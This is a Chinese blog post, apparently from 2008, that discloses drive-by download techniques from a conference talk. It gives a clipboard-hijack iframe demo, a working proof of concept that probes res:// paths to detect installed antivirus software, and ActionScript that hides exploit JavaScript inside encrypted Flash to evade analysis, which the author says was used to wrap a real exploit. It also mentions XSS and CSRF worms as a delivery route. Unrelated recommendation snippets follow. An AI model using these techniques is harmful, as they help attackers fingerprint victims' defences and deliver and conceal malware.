今天xKungfoo最后一天,G在上面做了个挂马产业链的议题。有些挂马猥亵技巧没有说详细,这里公开吧。其实有些没什么,就是技巧,有些人也玩过。
第一个、剪贴板劫持挂马
其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:
<iframe src=http://www.bt285.cn/ height=110 width=110></iframe>
<script>
var iframe = document.getElementsByTagName("iframe")[0];
var rng = document.body.createControlRange();
rng.add(iframe);
rng.execCommand('Copy');
</script>
只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。
第二个、img远程域检测本地域软件安装情况
网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:
<script>
////////////////////////////////////////////////////////
//Name: img标签远程域检测本地域软件是否存在poc
//Description: IE浏览器都有效
//Author: Knownsec Team
//Date: 2008-11-03
////////////////////////////////////////////////////////
knownImg = {}
knownImg.resList = [ //数组中填写本地软件id值与图片地址值(res协议或file协议)
{id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir%20PersonalEdition%20Classic\\setup.dll/#2/#132'},
{id: 'baidu', res: 'res://C:\\Program%20Files\\baidu\\Baidu%20Hi\\BaiduHi.exe/#2/#152'},
{id: 'Super Rabbit', res: 'res://C:\\Program%20Files\\Super%20Rabbit\\MagicSet\\timedate.exe/#2/BBNO'},
{id: '365Menshen', res: 'res://C:\\Program%20Files\\365Menshen\\menshen.exe/#2/#227'},
{id: 'quicktime', res: 'res://c:\\program%20files\\quicktime\\quicktimeplayer.exe/#2/#403'}
];
knownImg.ok_resList = new Array(); //确认软件存在时,填入此数组
knownImg.tmp_resList = new Array();
knownImg.checkSoft = function(){ //检测函数
if (document.all){
x = new Array();
for (i = 0; i < knownImg.resList.length; i++){
x[i] = new Image();
x[i].src = "";
knownImg.ok_resList.push(knownImg.resList[i].id); //将resList里的id值依次扔进ok_resList数组中
x[i].onload = function(){
//alert(knownImg.resList[i].id + ': return true');
}
x[i].onerror = function(){
//alert(knownImg.resList[i].id + ': return false');
knownImg.ok_resList.pop(); //软件不存在时,从ok_resList数组弹出对应的id值
}
x[i].src = knownImg.resList[i].res;
}
}
}
knownImg.checkSoft();
alert(knownImg.ok_resList); //弹出
document.write('你的系统中存在以下软件:<br />'+knownImg.ok_resList.join('<br />'));
</script>
IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。
第三个、利用Flash封装网马
这个更加猥亵,我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简 单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马 JS代码。那就没什么办法保护我们的网马JS代码了?有……
我们使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:
import flash.external.*;
ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}return request;}var xhr = ajax();function post_it(){var cmd = 'cmd=hi';xhr.open ('POST', 'create_cmd.php', false);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send(cmd);}post_it();");
上面的代码原理是什么呢,ExternalInterface类的call方法可以直接使用Flash容器(这里是HTML页)的JS函数,它有两 个参数,第一个是要调用的JS函数名,第二个是被调用的JS函数要执行的参数。我们这里其实是劫持了eval函数,这是JS的内置函数,利用它可以执行任 意的JS代码。根据这个原理,我们可以将所有的JS代码封装在Flash文件中。
G使用这个方法成功封装了06014网马,并对我们的Flash压缩加密保护,使用一般的Flash反编译软件是破解不了的,而且在网马的执行过程中,是无法通过浏览器抓包工具抓到网马的JS代码。这就起到了不错的保护作用:)。
第四个、Web2.0蠕虫式挂马
这个要怎么说呢,传统的挂马方式危害很大的有mass sql injection,在短时间内批量注入挂马。我们至今没见到Web2.0蠕虫式的挂马,大家讨论了认为:这是成本问题(但是是不是这样我就不知道了), 不是谁都可以轻易写出Web2.0蠕虫。不过大风今天在xKungfoo上说今后会让大家很方便写出XSS蠕虫的,那就是anehta平台将会提供打包一些蠕虫功能。
Web2.0蠕虫现在有两种表现形式:XSS蠕虫与CSRF蠕虫。在Web2.0蠕虫的传播过程中完全可以挂马。以前放出的一些Web2.0蠕虫都是一个玩笑,没给出危害,但是千万不要认为这永远都是黑客的一个玩笑。我们相信挂马的方式会出现这个的……
恩,这就是今天G的演讲内容的其中一部分。还有一些猥亵的技巧,也许对我们的Webscan全网监控系统都是一个挑战,不过我相信普通挂马者不会使用某些猥亵技巧,那就仅当娱乐吧。
分享到:
相关推荐
图灵⽣平简介 图灵⽣平简介 计算机之⽗图灵在世界科技世上有很⾼的地位,不只是因为他对⼈类的科学做出了巨⼤贡献,⽽且在那 个战⽕纷飞的年代,他还曾经帮助盟军破译了德国的密码系统,很⼤程度上缓解了盟军的压⼒...
其实这位世界上有名的人工智能之父是一名同性恋,1952年,图灵的一名同性性伴侣和一个同谋闯进了图灵的房子实施盗窃,而图灵因为遭受损失报警了,但是警方却控诉图灵说他猥亵别人。 人工智能之父图灵生平简介全文共3...
猥亵最小的场景图库。可建设的//Creates a scene node at the origin with no rotationvar origin = obscene.origin();//Creates a scene node translated forward 1 unitvar forward = obscene.translate([1, 0, 0]...
有毒的严重的猥亵威胁侮辱讨厌身份数数15294 1595 8449 478 7877 1405 百分比9.5% 0.9% 5.2% 0.2% 4.9% 0.8% 数据高度不平衡执行项目: spark - submit -- class < Class> project_2 .11 - 0.1 .jar <...
或者也许你宁愿不完全看猥亵? 如果是这种情况,宣誓替换是您的解决方案。 此扩展替换了常见的英语诅咒单词,更柔软,更加政治正确的替代方案。 (并且与“云”一词的少数常见的诅咒词)。 与其他扩展不同,这不会...
猥亵一个小型、简单的 AMD 模块解析器,用于单文件、AMD 风格的项目。用法只需在任何define语句之前包含amdainty.js文件。 它将创建define和require垫片,以完成包含依赖项的最低限度的工作。
猥亵 威胁 侮辱 identity_hate 我的设定 $ node --version v10.14.2 $ npm --version 6.4.1 入门 下载资料库 在项目目录中,可以运行: $ npm install $ npm start 在开发模式下运行应用程序。 打开在浏览器中...